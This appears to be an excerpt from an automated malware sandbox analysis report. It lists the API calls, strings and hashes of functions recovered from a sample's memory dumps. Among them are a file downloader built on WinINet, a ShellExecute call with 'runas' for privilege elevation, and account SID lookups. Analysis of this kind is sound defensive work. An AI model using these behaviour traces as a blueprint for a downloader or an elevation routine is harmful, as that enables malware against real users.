                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                            • String ID: runas
                                                                                                                                            • API String ID: 587946157-4000483414
                                                                                                                                            • Opcode ID: cac966d2bf474052de4b10d5538af56f3b49909b61f604ea8ac80a2de9d61eb6
                                                                                                                                            • Instruction ID: dd726d7c7dfc838aaa7c365466c40d0c39d9c719489897e04ae2c1064f0b0a2c
                                                                                                                                            • Opcode Fuzzy Hash: cac966d2bf474052de4b10d5538af56f3b49909b61f604ea8ac80a2de9d61eb6
                                                                                                                                            • Instruction Fuzzy Hash: 8851BF70640108AFEB08DF69C989BDE3BB6EF45344F608518F8155B2C1D7B5DA85CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F0F8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                            • Opcode ID: 9a16e6b3537ab6a5d70db438d3569bca73a4d7438c2ef73918bf6350fb7104d5
                                                                                                                                            • Instruction ID: 76c870dfcaa0d5386070ff42ca5ffd1877ca7c4e041d8fc5b39dd7e4b2a8d15d
                                                                                                                                            • Opcode Fuzzy Hash: 9a16e6b3537ab6a5d70db438d3569bca73a4d7438c2ef73918bf6350fb7104d5
                                                                                                                                            • Instruction Fuzzy Hash: 89519FB1A01615CBEB24CF65D9847AEB7F0FB44314F6481BAC401EB790D3799D0ACB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000F433,0040EF2C), ref: 0040F42C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 97825d8f26a605acf6a58983a0c89bdbf7a4cab852a816e77a0367ca63f625b4
                                                                                                                                            • Instruction ID: 36f1e7d1efaa85132187ba7e203d996d3109dfa99066f70058f5a9ce8acd492e
                                                                                                                                            • Opcode Fuzzy Hash: 97825d8f26a605acf6a58983a0c89bdbf7a4cab852a816e77a0367ca63f625b4
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0211BC7F
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B835
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B847
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B859
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B86B
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B87D
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B88F
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8A1
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8B3
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8C5
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8D7
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8E9
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B8FB
                                                                                                                                              • Part of subcall function 0211B818: _free.LIBCMT ref: 0211B90D
                                                                                                                                            • _free.LIBCMT ref: 0211BC74
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211BC96
                                                                                                                                            • _free.LIBCMT ref: 0211BCAB
                                                                                                                                            • _free.LIBCMT ref: 0211BCB6
                                                                                                                                            • _free.LIBCMT ref: 0211BCD8
                                                                                                                                            • _free.LIBCMT ref: 0211BCEB
                                                                                                                                            • _free.LIBCMT ref: 0211BCF9
                                                                                                                                            • _free.LIBCMT ref: 0211BD04
                                                                                                                                            • _free.LIBCMT ref: 0211BD3C
                                                                                                                                            • _free.LIBCMT ref: 0211BD43
                                                                                                                                            • _free.LIBCMT ref: 0211BD60
                                                                                                                                            • _free.LIBCMT ref: 0211BD78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: B
                                                                                                                                            • API String ID: 161543041-2386870291
                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: b907e6c4b5374378ac3b10f304774c24b7c2c5e1061e22ee3c6bdb69f5674753
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: 62315C31688304EFEF34AA39EC85B5A73EBAF40358FA44439E055DB150DF35EA418B10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0041BA2F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5E5
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5F7
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B609
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B61B
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B62D
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B63F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B651
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B663
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B675
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B687
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B699
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6AB
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6BD
                                                                                                                                            • _free.LIBCMT ref: 0041BA24
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041BA46
                                                                                                                                            • _free.LIBCMT ref: 0041BA5B
                                                                                                                                            • _free.LIBCMT ref: 0041BA66
                                                                                                                                            • _free.LIBCMT ref: 0041BA88
                                                                                                                                            • _free.LIBCMT ref: 0041BA9B
                                                                                                                                            • _free.LIBCMT ref: 0041BAA9
                                                                                                                                            • _free.LIBCMT ref: 0041BAB4
                                                                                                                                            • _free.LIBCMT ref: 0041BAEC
                                                                                                                                            • _free.LIBCMT ref: 0041BAF3
                                                                                                                                            • _free.LIBCMT ref: 0041BB10
                                                                                                                                            • _free.LIBCMT ref: 0041BB28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: pB
                                                                                                                                            • API String ID: 161543041-3059159000
                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: 02eb9b7f6cedb68595ea1e2e4df000aa86c265fce73759de2f294495a80403d0
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: BC315E31600700DFDB21AA3AE845BDB77E8EF80395F10951FE059D7251DB78ADC08798
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                            • Opcode ID: 85d014af914f65cc9923891e831f20f9f36d7ff5d182b98eb42bd64b66671185
                                                                                                                                            • Instruction ID: ea3fdeb2e4bdbd4bb5ce2fd47582209f9da935ba1865da0fbdcedc51db2c10c1
                                                                                                                                            • Opcode Fuzzy Hash: 85d014af914f65cc9923891e831f20f9f36d7ff5d182b98eb42bd64b66671185
                                                                                                                                            • Instruction Fuzzy Hash: A3C10570A44249EFDF25DF98D8A0BADBBF1AF49304F4440B8E9659B391C7319942CF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00402351
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402363
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040237A
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238B
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040239F
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004023A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                            • String ID: <$Microsoft Internet Explorer$runas
                                                                                                                                            • API String ID: 4294395943-436926838
                                                                                                                                            • Opcode ID: 4212a34dfa56d952eef48b40269fe4657b9eb26caea2bd5cb5b46d5a9bb85872
                                                                                                                                            • Instruction ID: 836f0c5934710c0407d646d4299d5f63ee009bd7aa37a993408d58964a26c1b2
                                                                                                                                            • Opcode Fuzzy Hash: 4212a34dfa56d952eef48b40269fe4657b9eb26caea2bd5cb5b46d5a9bb85872
                                                                                                                                            • Instruction Fuzzy Hash: A5410731E00118ABDB18DF65CD45BAEB779EF45300F50846EE915B72C1D7BCAA41CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: f8a04a3f27a253e5962f83ecd64874d78125c817f542f3e1d01edd95211aaadf
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: 4A21667A950108FFCB51EFA4D881DDE7BBBAF48340B9141A6E9159F121EB31EA54CF80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: 166d972883325de44ce7bdabef546b1d3901efceb99f724343cd7b5bc390e77d
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: FA21BB76900618EFCB41EF95C841DDD7FB8AF88344B00556AFA199B121DB35EAC4CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F937
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040F93F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F9C8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040F9F3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040FA48
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 1170836740-3733052814
                                                                                                                                            • Opcode ID: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction ID: 894b8edc5c57a2ad9ab008264311dd0855dc9107bafb368bc8a4d607022375e2
                                                                                                                                            • Opcode Fuzzy Hash: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction Fuzzy Hash: 7651B030B00215AFCF24DF29D840A6E7BA5AF44318F14807BE8086BBD2D7799D09CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2!A$api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-3344510271
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: cb64fe6ad5cfcc4e8d6b7301ff6b9be212c388882d563f31cd3313a8b65e95eb
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: 6721D871B01231BBCB318B389D41A9B3B689F057A0F270576FD15A7392DB38DD8185E8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction ID: 94bfb070cbba7aa6ff244b8d2a0fe0cff5127991feb4f3843ce6290b42f3fc6b
                                                                                                                                            • Opcode Fuzzy Hash: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction Fuzzy Hash: AD510571A8C641EFDB28AF74DC80A6E7BB6EF41718F5042B9E8109B180EB319605CB54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 2996455cbe232ae2e60e10dc37e6e12dcc0ea1e9d4f9ef0a4b56ef1023022040
                                                                                                                                            • Instruction ID: 2a1f976b7b4bcbb86613db8ff6b19fd986a78d3bd4204cc8e7b10c550d2c21a6
                                                                                                                                            • Opcode Fuzzy Hash: 2996455cbe232ae2e60e10dc37e6e12dcc0ea1e9d4f9ef0a4b56ef1023022040
                                                                                                                                            • Instruction Fuzzy Hash: 1851D571A05301AFDB24AF759881AEB7BB4EF45314F0041BFE51097282EB3D89C68A9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040857A
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1139504419
                                                                                                                                            • Opcode ID: 747017cd42a3fda193bfb032d162d03025e5e921311a098fa13f7e0c74a22b0a
                                                                                                                                            • Instruction ID: 1a67c78f0cb392b8ff53f714058822714b37d0e65a955eefefe6e82784eebe80
                                                                                                                                            • Opcode Fuzzy Hash: 747017cd42a3fda193bfb032d162d03025e5e921311a098fa13f7e0c74a22b0a
                                                                                                                                            • Instruction Fuzzy Hash: 0CE1E170E00208DFEF14EFA9C94579D7BB5AB01304F50846ED4553B2C2DBB99A89CF99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00405E33
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 00405EDC
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,00000010), ref: 00405F6D
                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 00405FF4
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406005
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600A
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040600F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileHttpReadRequest$OpenSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856522067-0
                                                                                                                                            • Opcode ID: 6fb7e0b7ced6ae677faf849f43d845e802a25b11d2176dfb1b901f1221911620
                                                                                                                                            • Instruction ID: 0815bf64a4598977de38fa6e31ec9a7cd70cf72a29c17ea7a1c6806020119ff9
                                                                                                                                            • Opcode Fuzzy Hash: 6fb7e0b7ced6ae677faf849f43d845e802a25b11d2176dfb1b901f1221911620
                                                                                                                                            • Instruction Fuzzy Hash: 6B81F771600008AFEB18DF28CD85BAE7B76EF85304F50417AF805A72D5D7399A91CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101EB2
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02101EE3
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101EF1
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02101F04
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02101F2E
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 02101F41
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02101FF2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856199767-0
                                                                                                                                            • Opcode ID: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction ID: da245020c4f4701bf6b2d648cab42e7854b776941152835fc7f86bd8ff76dccb
                                                                                                                                            • Opcode Fuzzy Hash: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction Fuzzy Hash: 1D516075A00219AFDB10DFA5DD88FAFBBBDEF44344F014569E905A3280EB749E059BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0210E120: Concurrency::cancel_current_task.LIBCPMT ref: 0210E241
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004026A0,00000000,00000000,00000000), ref: 021029C6
                                                                                                                                            • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?), ref: 021029D3
                                                                                                                                            • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 021029DA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                                                                            • String ID: HB$hB$runas
                                                                                                                                            • API String ID: 1039963361-2279071875
                                                                                                                                            • Opcode ID: 82e951c8a91862d43a4e1cbda381c2a80e0ba4ab15a03fcfabfbf8e519cf8787
                                                                                                                                            • Instruction ID: 5170cb0cdb8129aa87c12741721d53565e87c1ccc4a28072474d21f20407d820
                                                                                                                                            • Opcode Fuzzy Hash: 82e951c8a91862d43a4e1cbda381c2a80e0ba4ab15a03fcfabfbf8e519cf8787
                                                                                                                                            • Instruction Fuzzy Hash: 8341CF71250148AFEB28DF29CCD8B8D3B66AF89304F908619F91587BD5CBB9D8C18B44
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405BC5
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 00405BDA
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00405BFA
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C11
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$FileOpen$CreateRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4113138902-0
                                                                                                                                            • Opcode ID: 7afcf3ba51e1d786664fd5339b475634f779685474f0816cdc5f2f1f1dce4384
                                                                                                                                            • Instruction ID: f2f2221e68c15033dc25878cc5138cc8e1f36a1742d9ec25df9f850a3b97c991
                                                                                                                                            • Opcode Fuzzy Hash: 7afcf3ba51e1d786664fd5339b475634f779685474f0816cdc5f2f1f1dce4384
                                                                                                                                            • Instruction Fuzzy Hash: 3E31A731340208BBEB20DF65DD85FEE37A9EF48704F60412AF904A62C1D7B9E9818F58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0211B97F: _free.LIBCMT ref: 0211B9A4
                                                                                                                                            • _free.LIBCMT ref: 0211BA05
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211BA10
                                                                                                                                            • _free.LIBCMT ref: 0211BA1B
                                                                                                                                            • _free.LIBCMT ref: 0211BA6F
                                                                                                                                            • _free.LIBCMT ref: 0211BA7A
                                                                                                                                            • _free.LIBCMT ref: 0211BA85
                                                                                                                                            • _free.LIBCMT ref: 0211BA90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction ID: 66f793a2e9d50a9534d21649fe2bafbf04cfc66c9cf4c6a03a180aa53af4ba02
                                                                                                                                            • Opcode Fuzzy Hash: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction Fuzzy Hash: 10111AB1584B48FFDA30BFB0CC86FCB77DBAF50704F800835A2996A055EB75A6058E90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B72F: _free.LIBCMT ref: 0041B754
                                                                                                                                            • _free.LIBCMT ref: 0041B7B5
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B7C0
                                                                                                                                            • _free.LIBCMT ref: 0041B7CB
                                                                                                                                            • _free.LIBCMT ref: 0041B81F
                                                                                                                                            • _free.LIBCMT ref: 0041B82A
                                                                                                                                            • _free.LIBCMT ref: 0041B835
                                                                                                                                            • _free.LIBCMT ref: 0041B840
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction ID: ffe7088ae5449a6b3a5a215e186331137a1bbb89884f415634a75f73b0614f0f
                                                                                                                                            • Opcode Fuzzy Hash: 5cda7027745d1f273ad04cc00e165eb4e072d0c12b9d8509fdba0c13263103ec
                                                                                                                                            • Instruction Fuzzy Hash: DF116D31540B04EBDA20BFB2CC47FDB77ACDF84744F40481EB2AD6A092EB38A5848694
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,02103D40,00000000), ref: 021175AF
                                                                                                                                            • __fassign.LIBCMT ref: 0211778E
